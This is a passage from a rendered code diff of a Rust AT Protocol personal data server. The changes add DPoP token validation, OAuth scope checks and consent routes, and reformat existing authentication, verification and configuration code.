resolved_scopes.push(part.to_string()); 147 + } 148 + } 149 + 150 + Json(DereferenceScopeOutput { 151 + scope: resolved_scopes.join(" "), 152 + }) 153 + .into_response() 154 + }
+31 -21
src/api/verification.rs
··· 49 .await 50 { 51 Ok(id) => id, 52 - Err(_) => return ( 53 - StatusCode::INTERNAL_SERVER_ERROR, 54 - Json(json!({"error": "InternalError", "message": "User not found"})), 55 - ) 56 - .into_response(), 57 }; 58 59 let channel_str = input.channel.as_str(); ··· 88 .into_response(), 89 }; 90 91 - let pending_identifier = match record.pending_identifier { 92 - Some(p) => p, 93 - None => return ( 94 - StatusCode::BAD_REQUEST, 95 - Json(json!({"error": "InvalidRequest", "message": "No pending identifier found"})), 96 - ) 97 - .into_response(), 98 - }; 99 100 if record.expires_at < Utc::now() { 101 return ( ··· 115 116 let mut tx = match state.db.begin().await { 117 Ok(tx) => tx, 118 - Err(_) => return ( 119 - StatusCode::INTERNAL_SERVER_ERROR, 120 - Json(json!({"error": "InternalError"})), 121 - ) 122 - .into_response(), 123 }; 124 125 let update_result = match channel_str { ··· 148 149 if let Err(e) = update_result { 150 error!("Failed to update user channel: {:?}", e); 151 - if channel_str == "email" && e.as_database_error().map(|db| db.is_unique_violation()).unwrap_or(false) { 152 return ( 153 StatusCode::BAD_REQUEST, 154 Json(json!({"error": "EmailTaken", "message": "Email already in use"})), ··· 168 channel_str as _ 169 ) 170 .execute(&mut *tx) 171 - .await { 172 error!("Failed to delete verification record: {:?}", e); 173 return ( 174 StatusCode::INTERNAL_SERVER_ERROR, ··· 177 .into_response(); 178 } 179 180 - if let Err(_) = tx.commit().await { 181 return ( 182 StatusCode::INTERNAL_SERVER_ERROR, 183 Json(json!({"error": "InternalError"})),
··· 49 .await 50 { 51 Ok(id) => id, 52 + Err(_) => { 53 + return ( 54 + StatusCode::INTERNAL_SERVER_ERROR, 55 + Json(json!({"error": "InternalError", "message": "User not found"})), 56 + ) 57 + .into_response(); 58 + } 59 }; 60 61 let channel_str = input.channel.as_str(); ··· 90 .into_response(), 91 }; 92 93 + let pending_identifier = 94 + match record.pending_identifier { 95 + Some(p) => p, 96 + None => return ( 97 + StatusCode::BAD_REQUEST, 98 + Json(json!({"error": "InvalidRequest", "message": "No pending identifier found"})), 99 + ) 100 + .into_response(), 101 + }; 102 103 if record.expires_at < Utc::now() { 104 return ( ··· 118 119 let mut tx = match state.db.begin().await { 120 Ok(tx) => tx, 121 + Err(_) => { 122 + return ( 123 + StatusCode::INTERNAL_SERVER_ERROR, 124 + Json(json!({"error": "InternalError"})), 125 + ) 126 + .into_response(); 127 + } 128 }; 129 130 let update_result = match channel_str { ··· 153 154 if let Err(e) = update_result { 155 error!("Failed to update user channel: {:?}", e); 156 + if channel_str == "email" 157 + && e.as_database_error() 158 + .map(|db| db.is_unique_violation()) 159 + .unwrap_or(false) 160 + { 161 return ( 162 StatusCode::BAD_REQUEST, 163 Json(json!({"error": "EmailTaken", "message": "Email already in use"})), ··· 177 channel_str as _ 178 ) 179 .execute(&mut *tx) 180 + .await 181 + { 182 error!("Failed to delete verification record: {:?}", e); 183 return ( 184 StatusCode::INTERNAL_SERVER_ERROR, ··· 187 .into_response(); 188 } 189 190 + if tx.commit().await.is_err() { 191 return ( 192 StatusCode::INTERNAL_SERVER_ERROR, 193 Json(json!({"error": "InternalError"})),
+18 -18
src/appview/mod.rs
··· 83 pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> { 84 { 85 let cache = self.did_cache.read().await; 86 - if let Some(cached) = cache.get(did) { 87 - if cached.resolved_at.elapsed() < self.cache_ttl { 88 - return Some(ResolvedService { 89 - url: cached.url.clone(), 90 - did: cached.did.clone(), 91 - }); 92 - } 93 } 94 } 95 ··· 240 } 241 } 242 243 - if let Some(service) = doc.service.first() { 244 - if service.service_endpoint.starts_with("http") { 245 - warn!( 246 - "No explicit AppView service found for {}, using first service: {}", 247 - doc.id, service.service_endpoint 248 - ); 249 - return Some(ResolvedService { 250 - url: service.service_endpoint.clone(), 251 - did: doc.id.clone(), 252 - }); 253 - } 254 } 255 256 if doc.id.starts_with("did:web:") {
··· 83 pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> { 84 { 85 let cache = self.did_cache.read().await; 86 + if let Some(cached) = cache.get(did) 87 + && cached.resolved_at.elapsed() < self.cache_ttl 88 + { 89 + return Some(ResolvedService { 90 + url: cached.url.clone(), 91 + did: cached.did.clone(), 92 + }); 93 } 94 } 95 ··· 240 } 241 } 242 243 + if let Some(service) = doc.service.first() 244 + && service.service_endpoint.starts_with("http") 245 + { 246 + warn!( 247 + "No explicit AppView service found for {}, using first service: {}", 248 + doc.id, service.service_endpoint 249 + ); 250 + return Some(ResolvedService { 251 + url: service.service_endpoint.clone(), 252 + did: doc.id.clone(), 253 + }); 254 } 255 256 if doc.id.starts_with("did:web:") {
+107 -21
src/auth/extractor.rs
··· 8 9 use super::{ 10 AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, 11 - validate_bearer_token_cached_allow_deactivated, 12 }; 13 use crate::state::AppState; 14 ··· 63 } 64 } 65 66 fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> { 67 let auth_header = auth_header.trim(); 68 ··· 151 .to_str() 152 .map_err(|_| AuthError::InvalidFormat)?; 153 154 - let token = extract_bearer_token(auth_header)?; 155 156 - match validate_bearer_token_cached(&state.db, &state.cache, token).await { 157 - Ok(user) => Ok(BearerAuth(user)), 158 - Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), 159 - Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 160 - Err(_) => Err(AuthError::AuthenticationFailed), 161 } 162 } 163 } ··· 178 .to_str() 179 .map_err(|_| AuthError::InvalidFormat)?; 180 181 - let token = extract_bearer_token(auth_header)?; 182 183 - match validate_bearer_token_cached_allow_deactivated(&state.db, &state.cache, token).await { 184 - Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 185 - Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 186 - Err(_) => Err(AuthError::AuthenticationFailed), 187 } 188 } 189 } ··· 204 .to_str() 205 .map_err(|_| AuthError::InvalidFormat)?; 206 207 - let token = extract_bearer_token(auth_header)?; 208 209 - match validate_bearer_token_cached(&state.db, &state.cache, token).await { 210 - Ok(user) => { 211 - if !user.is_admin { 212 - return Err(AuthError::AdminRequired); 213 } 214 - Ok(BearerAuthAdmin(user)) 215 } 216 - Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), 217 - Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 218 - Err(_) => Err(AuthError::AuthenticationFailed), 219 } 220 } 221 } 222
··· 8 9 use super::{ 10 AuthenticatedUser, TokenValidationError, validate_bearer_token_cached, 11 + validate_bearer_token_cached_allow_deactivated, validate_token_with_dpop, 12 }; 13 use crate::state::AppState; 14 ··· 63 } 64 } 65 66 + #[cfg(test)] 67 fn extract_bearer_token(auth_header: &str) -> Result<&str, AuthError> { 68 let auth_header = auth_header.trim(); 69 ··· 152 .to_str() 153 .map_err(|_| AuthError::InvalidFormat)?; 154 155 + let extracted = 156 + extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?; 157 + 158 + if extracted.is_dpop { 159 + let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok()); 160 + let method = parts.method.as_str(); 161 + let uri = parts.uri.to_string(); 162 163 + match validate_token_with_dpop( 164 + &state.db, 165 + &extracted.token, 166 + true, 167 + dpop_proof, 168 + method, 169 + &uri, 170 + false, 171 + ) 172 + .await 173 + { 174 + Ok(user) => Ok(BearerAuth(user)), 175 + Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), 176 + Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 177 + Err(_) => Err(AuthError::AuthenticationFailed), 178 + } 179 + } else { 180 + match validate_bearer_token_cached(&state.db, &state.cache, &extracted.token).await { 181 + Ok(user) => Ok(BearerAuth(user)), 182 + Err(TokenValidationError::AccountDeactivated) => Err(AuthError::AccountDeactivated), 183 + Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 184 + Err(_) => Err(AuthError::AuthenticationFailed), 185 + } 186 } 187 } 188 } ··· 203 .to_str() 204 .map_err(|_| AuthError::InvalidFormat)?; 205 206 + let extracted = 207 + extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?; 208 209 + if extracted.is_dpop { 210 + let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok()); 211 + let method = parts.method.as_str(); 212 + let uri = parts.uri.to_string(); 213 + 214 + match validate_token_with_dpop( 215 + &state.db, 216 + &extracted.token, 217 + true, 218 + dpop_proof, 219 + method, 220 + &uri, 221 + true, 222 + ) 223 + .await 224 + { 225 + Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 226 + Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 227 + Err(_) => Err(AuthError::AuthenticationFailed), 228 + } 229 + } else { 230 + match validate_bearer_token_cached_allow_deactivated( 231 + &state.db, 232 + &state.cache, 233 + &extracted.token, 234 + ) 235 + .await 236 + { 237 + Ok(user) => Ok(BearerAuthAllowDeactivated(user)), 238 + Err(TokenValidationError::AccountTakedown) => Err(AuthError::AccountTakedown), 239 + Err(_) => Err(AuthError::AuthenticationFailed), 240 + } 241 } 242 } 243 } ··· 258 .to_str() 259 .map_err(|_| AuthError::InvalidFormat)?; 260 261 + let extracted = 262 + extract_auth_token_from_header(Some(auth_header)).ok_or(AuthError::InvalidFormat)?; 263 264 + let user = if extracted.is_dpop { 265 + let dpop_proof = parts.headers.get("dpop").and_then(|h| h.to_str().ok()); 266 + let method = parts.method.as_str(); 267 + let uri = parts.uri.to_string(); 268 + 269 + match validate_token_with_dpop( 270 + &state.db, 271 + &extracted.token, 272 + true, 273 + dpop_proof, 274 + method, 275 + &uri, 276 + false, 277 + ) 278 + .await 279 + { 280 + Ok(user) => user, 281 + Err(TokenValidationError::AccountDeactivated) => { 282 + return Err(AuthError::AccountDeactivated); 283 } 284 + Err(TokenValidationError::AccountTakedown) => { 285 + return Err(AuthError::AccountTakedown); 286 + } 287 + Err(_) => return Err(AuthError::AuthenticationFailed), 288 } 289 + } else { 290 + match validate_bearer_token_cached(&state.db, &state.cache, &extracted.token).await { 291 + Ok(user) => user, 292 + Err(TokenValidationError::AccountDeactivated) => { 293 + return Err(AuthError::AccountDeactivated); 294 + } 295 + Err(TokenValidationError::AccountTakedown) => { 296 + return Err(AuthError::AccountTakedown); 297 + } 298 + Err(_) => return Err(AuthError::AuthenticationFailed), 299 + } 300 + }; 301 + 302 + if !user.is_admin { 303 + return Err(AuthError::AdminRequired); 304 } 305 + Ok(BearerAuthAdmin(user)) 306 } 307 } 308
+65 -38
src/auth/mod.rs
··· 5 use std::time::Duration; 6 7 use crate::cache::Cache; 8 9 pub mod extractor; 10 pub mod service; 11 pub mod token; 12 pub mod verify; ··· 15 AuthError, BearerAuth, BearerAuthAdmin, BearerAuthAllowDeactivated, ExtractedToken, 16 extract_auth_token_from_header, extract_bearer_token_from_header, 17 }; 18 pub use token::{ 19 SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS, 20 TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, TokenWithMetadata, create_access_token, ··· 24 pub use verify::{ 25 get_did_from_token, get_jti_from_token, verify_access_token, verify_refresh_token, verify_token, 26 }; 27 - pub use service::{ServiceTokenClaims, ServiceTokenVerifier, is_service_token}; 28 29 const KEY_CACHE_TTL_SECS: u64 = 300; 30 const SESSION_CACHE_TTL_SECS: u64 = 60; ··· 53 pub key_bytes: Option<Vec<u8>>, 54 pub is_oauth: bool, 55 pub is_admin: bool, 56 } 57 58 pub async fn validate_bearer_token( ··· 114 } 115 } 116 117 - let (decrypted_key, deactivated_at, takedown_ref, is_admin) = if let Some(key) = cached_key { 118 let user_status = sqlx::query!( 119 "SELECT deactivated_at, takedown_ref, is_admin FROM users WHERE did = $1", 120 did ··· 125 .flatten(); 126 127 match user_status { 128 - Some(status) => (Some(key), status.deactivated_at, status.takedown_ref, status.is_admin), 129 None => (None, None, None, false), 130 } 131 } else if let Some(user) = sqlx::query!( ··· 153 .await; 154 } 155 156 - (Some(key), user.deactivated_at, user.takedown_ref, user.is_admin) 157 } else { 158 (None, None, None, false) 159 }; ··· 194 195 session_valid = session_exists.is_some(); 196 197 - if session_valid 198 - && let Some(c) = cache { 199 - let _ = c 200 - .set( 201 - &session_cache_key, 202 - "1", 203 - Duration::from_secs(SESSION_CACHE_TTL_SECS), 204 - ) 205 - .await; 206 - } 207 } 208 209 if session_valid { ··· 212 key_bytes: Some(decrypted_key), 213 is_oauth: false, 214 is_admin, 215 }); 216 } 217 } ··· 232 .await 233 .ok() 234 .flatten() 235 - { 236 - if !allow_deactivated && oauth_token.deactivated_at.is_some() { 237 - return Err(TokenValidationError::AccountDeactivated); 238 - } 239 240 - if oauth_token.takedown_ref.is_some() { 241 - return Err(TokenValidationError::AccountTakedown); 242 - } 243 244 - let now = chrono::Utc::now(); 245 - if oauth_token.expires_at > now { 246 - let key_bytes = if let (Some(kb), Some(ev)) = 247 - (&oauth_token.key_bytes, oauth_token.encryption_version) 248 - { 249 - crate::config::decrypt_key(kb, Some(ev)).ok() 250 - } else { 251 - None 252 - }; 253 - return Ok(AuthenticatedUser { 254 - did: oauth_token.did, 255 - key_bytes, 256 - is_oauth: true, 257 - is_admin: oauth_token.is_admin, 258 - }); 259 - } 260 } 261 262 Err(TokenValidationError::AuthenticationFailed) 263 } ··· 314 if user_info.takedown_ref.is_some() { 315 return Err(TokenValidationError::AccountTakedown); 316 } 317 - let key_bytes = if let (Some(kb), Some(ev)) = (&user_info.key_bytes, user_info.encryption_version) { 318 crate::config::decrypt_key(kb, Some(ev)).ok() 319 } else { 320 None ··· 324 key_bytes, 325 is_oauth: true, 326 is_admin: user_info.is_admin, 327 }) 328 } 329 Err(_) => Err(TokenValidationError::AuthenticationFailed),
··· 5 use std::time::Duration; 6 7 use crate::cache::Cache; 8 + use crate::oauth::scopes::ScopePermissions; 9 10 pub mod extractor; 11 + pub mod scope_check; 12 pub mod service; 13 pub mod token; 14 pub mod verify; ··· 17 AuthError, BearerAuth, BearerAuthAdmin, BearerAuthAllowDeactivated, ExtractedToken, 18 extract_auth_token_from_header, extract_bearer_token_from_header, 19 }; 20 + pub use service::{ServiceTokenClaims, ServiceTokenVerifier, is_service_token}; 21 pub use token::{ 22 SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, TOKEN_TYPE_ACCESS, 23 TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, TokenWithMetadata, create_access_token, ··· 27 pub use verify::{ 28 get_did_from_token, get_jti_from_token, verify_access_token, verify_refresh_token, verify_token, 29 }; 30 31 const KEY_CACHE_TTL_SECS: u64 = 300; 32 const SESSION_CACHE_TTL_SECS: u64 = 60; ··· 55 pub key_bytes: Option<Vec<u8>>, 56 pub is_oauth: bool, 57 pub is_admin: bool, 58 + pub scope: Option<String>, 59 + } 60 + 61 + impl AuthenticatedUser { 62 + pub fn permissions(&self) -> ScopePermissions { 63 + if !self.is_oauth { 64 + return ScopePermissions::from_scope_string(Some("atproto")); 65 + } 66 + ScopePermissions::from_scope_string(self.scope.as_deref()) 67 + } 68 } 69 70 pub async fn validate_bearer_token( ··· 126 } 127 } 128 129 + let (decrypted_key, deactivated_at, takedown_ref, is_admin) = if let Some(key) = cached_key 130 + { 131 let user_status = sqlx::query!( 132 "SELECT deactivated_at, takedown_ref, is_admin FROM users WHERE did = $1", 133 did ··· 138 .flatten(); 139 140 match user_status { 141 + Some(status) => ( 142 + Some(key), 143 + status.deactivated_at, 144 + status.takedown_ref, 145 + status.is_admin, 146 + ), 147 None => (None, None, None, false), 148 } 149 } else if let Some(user) = sqlx::query!( ··· 171 .await; 172 } 173 174 + ( 175 + Some(key), 176 + user.deactivated_at, 177 + user.takedown_ref, 178 + user.is_admin, 179 + ) 180 } else { 181 (None, None, None, false) 182 }; ··· 217 218 session_valid = session_exists.is_some(); 219 220 + if session_valid && let Some(c) = cache { 221 + let _ = c 222 + .set( 223 + &session_cache_key, 224 + "1", 225 + Duration::from_secs(SESSION_CACHE_TTL_SECS), 226 + ) 227 + .await; 228 + } 229 } 230 231 if session_valid { ··· 234 key_bytes: Some(decrypted_key), 235 is_oauth: false, 236 is_admin, 237 + scope: None, 238 }); 239 } 240 } ··· 255 .await 256 .ok() 257 .flatten() 258 + { 259 + if !allow_deactivated && oauth_token.deactivated_at.is_some() { 260 + return Err(TokenValidationError::AccountDeactivated); 261 + } 262 263 + if oauth_token.takedown_ref.is_some() { 264 + return Err(TokenValidationError::AccountTakedown); 265 + } 266 267 + let now = chrono::Utc::now(); 268 + if oauth_token.expires_at > now { 269 + let key_bytes = if let (Some(kb), Some(ev)) = 270 + (&oauth_token.key_bytes, oauth_token.encryption_version) 271 + { 272 + crate::config::decrypt_key(kb, Some(ev)).ok() 273 + } else { 274 + None 275 + }; 276 + return Ok(AuthenticatedUser { 277 + did: oauth_token.did, 278 + key_bytes, 279 + is_oauth: true, 280 + is_admin: oauth_token.is_admin, 281 + scope: oauth_info.scope, 282 + }); 283 } 284 + } 285 286 Err(TokenValidationError::AuthenticationFailed) 287 } ··· 338 if user_info.takedown_ref.is_some() { 339 return Err(TokenValidationError::AccountTakedown); 340 } 341 + let key_bytes = if let (Some(kb), Some(ev)) = 342 + (&user_info.key_bytes, user_info.encryption_version) 343 + { 344 crate::config::decrypt_key(kb, Some(ev)).ok() 345 } else { 346 None ··· 350 key_bytes, 351 is_oauth: true, 352 is_admin: user_info.is_admin, 353 + scope: result.scope, 354 }) 355 } 356 Err(_) => Err(TokenValidationError::AuthenticationFailed),
+118
src/auth/scope_check.rs
···
··· 1 + #![allow(clippy::result_large_err)] 2 + 3 + use axum::http::StatusCode; 4 + use axum::response::{IntoResponse, Response}; 5 + use serde_json::json; 6 + 7 + use crate::oauth::scopes::{ 8 + AccountAction, AccountAttr, IdentityAttr, RepoAction, ScopePermissions, 9 + }; 10 + 11 + pub fn check_repo_scope( 12 + is_oauth: bool, 13 + scope: Option<&str>, 14 + action: RepoAction, 15 + collection: &str, 16 + ) -> Result<(), Response> { 17 + if !is_oauth { 18 + return Ok(()); 19 + } 20 + 21 + let permissions = ScopePermissions::from_scope_string(scope); 22 + permissions.assert_repo(action, collection).map_err(|e| { 23 + ( 24 + StatusCode::FORBIDDEN, 25 + axum::Json(json!({ 26 + "error": "InsufficientScope", 27 + "message": e.to_string() 28 + })), 29 + ) 30 + .into_response() 31 + }) 32 + } 33 + 34 + pub fn check_blob_scope(is_oauth: bool, scope: Option<&str>, mime: &str) -> Result<(), Response> { 35 + if !is_oauth { 36 + return Ok(()); 37 + } 38 + 39 + let permissions = ScopePermissions::from_scope_string(scope); 40 + permissions.assert_blob(mime).map_err(|e| { 41 + ( 42 + StatusCode::FORBIDDEN, 43 + axum::Json(json!({ 44 + "error": "InsufficientScope", 45 + "message": e.to_string() 46 + })), 47 + ) 48 + .into_response() 49 + }) 50 + } 51 + 52 + pub fn check_rpc_scope( 53 + is_oauth: bool, 54 + scope: Option<&str>, 55 + aud: &str, 56 + lxm: &str, 57 + ) -> Result<(), Response> { 58 + if !is_oauth { 59 + return Ok(()); 60 + } 61 + 62 + let permissions = ScopePermissions::from_scope_string(scope); 63 + permissions.assert_rpc(aud, lxm).map_err(|e| { 64 + ( 65 + StatusCode::FORBIDDEN, 66 + axum::Json(json!({ 67 + "error": "InsufficientScope", 68 + "message": e.to_string() 69 + })), 70 + ) 71 + .into_response() 72 + }) 73 + } 74 + 75 + pub fn check_account_scope( 76 + is_oauth: bool, 77 + scope: Option<&str>, 78 + attr: AccountAttr, 79 + action: AccountAction, 80 + ) -> Result<(), Response> { 81 + if !is_oauth { 82 + return Ok(()); 83 + } 84 + 85 + let permissions = ScopePermissions::from_scope_string(scope); 86 + permissions.assert_account(attr, action).map_err(|e| { 87 + ( 88 + StatusCode::FORBIDDEN, 89 + axum::Json(json!({ 90 + "error": "InsufficientScope", 91 + "message": e.to_string() 92 + })), 93 + ) 94 + .into_response() 95 + }) 96 + } 97 + 98 + pub fn check_identity_scope( 99 + is_oauth: bool, 100 + scope: Option<&str>, 101 + attr: IdentityAttr, 102 + ) -> Result<(), Response> { 103 + if !is_oauth { 104 + return Ok(()); 105 + } 106 + 107 + let permissions = ScopePermissions::from_scope_string(scope); 108 + permissions.assert_identity(attr).map_err(|e| { 109 + ( 110 + StatusCode::FORBIDDEN, 111 + axum::Json(json!({ 112 + "error": "InsufficientScope", 113 + "message": e.to_string() 114 + })), 115 + ) 116 + .into_response() 117 + }) 118 + }
+6 -5
src/auth/service.rs
··· 278 279 fn parse_did_key_multibase(multibase: &str) -> Result<VerifyingKey> { 280 if !multibase.starts_with('z') { 281 - return Err(anyhow!("Expected base58btc multibase encoding (starts with 'z')")); 282 } 283 284 - let (_, decoded) = multibase::decode(multibase) 285 - .map_err(|e| anyhow!("Failed to decode multibase: {}", e))?; 286 287 if decoded.len() < 2 { 288 return Err(anyhow!("Invalid multicodec data")); ··· 302 return Err(anyhow!("Only secp256k1 keys are supported")); 303 } 304 305 - VerifyingKey::from_sec1_bytes(key_bytes) 306 - .map_err(|e| anyhow!("Invalid public key: {}", e)) 307 } 308 309 pub fn is_service_token(token: &str) -> bool {
··· 278 279 fn parse_did_key_multibase(multibase: &str) -> Result<VerifyingKey> { 280 if !multibase.starts_with('z') { 281 + return Err(anyhow!( 282 + "Expected base58btc multibase encoding (starts with 'z')" 283 + )); 284 } 285 286 + let (_, decoded) = 287 + multibase::decode(multibase).map_err(|e| anyhow!("Failed to decode multibase: {}", e))?; 288 289 if decoded.len() < 2 { 290 return Err(anyhow!("Invalid multicodec data")); ··· 304 return Err(anyhow!("Only secp256k1 keys are supported")); 305 } 306 307 + VerifyingKey::from_sec1_bytes(key_bytes).map_err(|e| anyhow!("Invalid public key: {}", e)) 308 } 309 310 pub fn is_service_token(token: &str) -> bool {
+16 -14
src/auth/verify.rs
··· 113 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 114 115 if let Some(expected) = expected_typ 116 - && header.typ != expected { 117 - return Err(anyhow!( 118 - "Invalid token type: expected {}, got {}", 119 - expected, 120 - header.typ 121 - )); 122 - } 123 124 let signature_bytes = URL_SAFE_NO_PAD 125 .decode(signature_b64) ··· 185 } 186 187 if let Some(expected) = expected_typ 188 - && header.typ != expected { 189 - return Err(anyhow!( 190 - "Invalid token type: expected {}, got {}", 191 - expected, 192 - header.typ 193 - )); 194 - } 195 196 let signature_bytes = URL_SAFE_NO_PAD 197 .decode(signature_b64)
··· 113 serde_json::from_slice(&header_bytes).context("JSON decode of header failed")?; 114 115 if let Some(expected) = expected_typ 116 + && header.typ != expected 117 + { 118 + return Err(anyhow!( 119 + "Invalid token type: expected {}, got {}", 120 + expected, 121 + header.typ 122 + )); 123 + } 124 125 let signature_bytes = URL_SAFE_NO_PAD 126 .decode(signature_b64) ··· 186 } 187 188 if let Some(expected) = expected_typ 189 + && header.typ != expected 190 + { 191 + return Err(anyhow!( 192 + "Invalid token type: expected {}, got {}", 193 + expected, 194 + header.typ 195 + )); 196 + } 197 198 let signature_bytes = URL_SAFE_NO_PAD 199 .decode(signature_b64)
+2 -2
src/comms/mod.rs
··· 8 }; 9 10 pub use service::{ 11 - CommsService, channel_display_name, enqueue_2fa_code, enqueue_account_deletion, 12 - enqueue_comms, enqueue_email_update, enqueue_email_verification, enqueue_password_reset, 13 enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, 14 }; 15
··· 8 }; 9 10 pub use service::{ 11 + CommsService, channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_comms, 12 + enqueue_email_update, enqueue_email_verification, enqueue_password_reset, 13 enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, 14 }; 15
+2 -1
src/comms/sender.rs
··· 87 88 pub fn from_env() -> Option<Self> { 89 let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?; 90 - let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "Tranquil PDS".to_string()); 91 Some(Self::new(from_address, from_name)) 92 } 93
··· 87 88 pub fn from_env() -> Option<Self> { 89 let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?; 90 + let from_name = 91 + std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "Tranquil PDS".to_string()); 92 Some(Self::new(from_address, from_name)) 93 } 94
+1 -1
src/comms/service.rs
··· 10 use uuid::Uuid; 11 12 use super::sender::{CommsSender, SendError}; 13 - use super::types::{NewComms, CommsChannel, CommsStatus, QueuedComms}; 14 15 pub struct CommsService { 16 db: PgPool,
··· 10 use uuid::Uuid; 11 12 use super::sender::{CommsSender, SendError}; 13 + use super::types::{CommsChannel, CommsStatus, NewComms, QueuedComms}; 14 15 pub struct CommsService { 16 db: PgPool,
+9 -3
src/config.rs
··· 46 } 47 }); 48 49 - if jwt_secret.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() { 50 panic!("JWT_SECRET must be at least 32 characters"); 51 } 52 53 - if dpop_secret.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() { 54 panic!("DPOP_SECRET must be at least 32 characters"); 55 } 56 ··· 97 } 98 }); 99 100 - if master_key.len() < 32 && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() { 101 panic!("MASTER_KEY must be at least 32 characters"); 102 } 103
··· 46 } 47 }); 48 49 + if jwt_secret.len() < 32 50 + && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() 51 + { 52 panic!("JWT_SECRET must be at least 32 characters"); 53 } 54 55 + if dpop_secret.len() < 32 56 + && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() 57 + { 58 panic!("DPOP_SECRET must be at least 32 characters"); 59 } 60 ··· 101 } 102 }); 103 104 + if master_key.len() < 32 105 + && std::env::var("TRANQUIL_PDS_ALLOW_INSECURE_SECRETS").is_err() 106 + { 107 panic!("MASTER_KEY must be at least 32 characters"); 108 } 109
+5 -4
src/crawlers.rs
··· 79 } 80 81 if let Some(cb) = &self.circuit_breaker 82 - && !cb.can_execute().await { 83 - debug!("Skipping crawler notification due to circuit breaker open"); 84 - return; 85 - } 86 87 self.mark_notified(); 88 let circuit_breaker = self.circuit_breaker.clone();
··· 79 } 80 81 if let Some(cb) = &self.circuit_breaker 82 + && !cb.can_execute().await 83 + { 84 + debug!("Skipping crawler notification due to circuit breaker open"); 85 + return; 86 + } 87 88 self.mark_notified(); 89 let circuit_breaker = self.circuit_breaker.clone();
+1 -1
src/handle/mod.rs
··· 1 - use hickory_resolver::config::{ResolverConfig, ResolverOpts}; 2 use hickory_resolver::TokioAsyncResolver; 3 use reqwest::Client; 4 use std::time::Duration; 5 use thiserror::Error;
··· 1 use hickory_resolver::TokioAsyncResolver; 2 + use hickory_resolver::config::{ResolverConfig, ResolverOpts}; 3 use reqwest::Client; 4 use std::time::Duration; 5 use thiserror::Error;
+17 -1
src/lib.rs
··· 3 pub mod auth; 4 pub mod cache; 5 pub mod circuit_breaker; 6 pub mod config; 7 pub mod crawlers; 8 pub mod handle; 9 pub mod image; 10 pub mod metrics; 11 - pub mod comms; 12 pub mod oauth; 13 pub mod plc; 14 pub mod rate_limit; ··· 344 .route("/oauth/authorize", get(oauth::endpoints::authorize_get)) 345 .route("/oauth/authorize", post(oauth::endpoints::authorize_post)) 346 .route( 347 "/oauth/authorize/select", 348 post(oauth::endpoints::authorize_select), 349 ) ··· 359 "/oauth/authorize/deny", 360 post(oauth::endpoints::authorize_deny), 361 ) 362 .route("/oauth/token", post(oauth::endpoints::token_endpoint)) 363 .route("/oauth/revoke", post(oauth::endpoints::revoke_token)) 364 .route( ··· 368 .route( 369 "/xrpc/com.atproto.temp.checkSignupQueue", 370 get(api::temp::check_signup_queue), 371 ) 372 .route( 373 "/xrpc/com.tranquil.account.getNotificationPrefs",
··· 3 pub mod auth; 4 pub mod cache; 5 pub mod circuit_breaker; 6 + pub mod comms; 7 pub mod config; 8 pub mod crawlers; 9 pub mod handle; 10 pub mod image; 11 pub mod metrics; 12 pub mod oauth; 13 pub mod plc; 14 pub mod rate_limit; ··· 344 .route("/oauth/authorize", get(oauth::endpoints::authorize_get)) 345 .route("/oauth/authorize", post(oauth::endpoints::authorize_post)) 346 .route( 347 + "/oauth/authorize/accounts", 348 + get(oauth::endpoints::authorize_accounts), 349 + ) 350 + .route( 351 "/oauth/authorize/select", 352 post(oauth::endpoints::authorize_select), 353 ) ··· 363 "/oauth/authorize/deny", 364 post(oauth::endpoints::authorize_deny), 365 ) 366 + .route( 367 + "/oauth/authorize/consent", 368 + get(oauth::endpoints::consent_get), 369 + ) 370 + .route( 371 + "/oauth/authorize/consent", 372 + post(oauth::endpoints::consent_post), 373 + ) 374 .route("/oauth/token", post(oauth::endpoints::token_endpoint)) 375 .route("/oauth/revoke", post(oauth::endpoints::revoke_token)) 376 .route( ··· 380 .route( 381 "/xrpc/com.atproto.temp.checkSignupQueue", 382 get(api::temp::check_signup_queue), 383 + ) 384 + .route( 385 + "/xrpc/com.atproto.temp.dereferenceScope", 386 + post(api::temp::dereference_scope), 387 ) 388 .route( 389 "/xrpc/com.tranquil.account.getNotificationPrefs",
+3 -3
src/main.rs
